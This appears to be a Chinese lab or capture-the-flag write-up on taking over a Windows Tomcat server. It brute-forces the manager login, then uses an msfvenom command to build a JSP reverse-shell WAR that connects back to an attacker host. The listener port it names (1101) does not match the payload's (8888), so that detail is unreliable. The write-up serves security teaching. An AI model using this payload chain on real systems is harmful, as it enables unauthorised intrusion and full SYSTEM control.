0x01 端口扫描
开放端口如下:
- 8080端口:Tomcat 7.0.88
操作系统猜测为windows系统
访问8080端口
0x02 Tomcat应用管理服务的弱口令
尝试使用MSF自带的爆破工具进行爆破
等待一段时间获得账户和密码
成功登录,我们获得了war包应用文件的上传和部署权限
接下来构造一个war包然后上传,命令如下
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=8888 -f war > xxxwtbb99.war
监听1101端口
至此我们拿下了最高权限SYSTEM权限,因为主机系统为windows系统,且Tomcat应用管理服务运行于system权限之下,因此我们直接获得了最高的SYSTEM权限。
0x03 总结
- 信息搜集获得tomcat默认页面
- tomcat manager app 弱口令登录
- 上传war包部署并访问,获得SYSTEM权限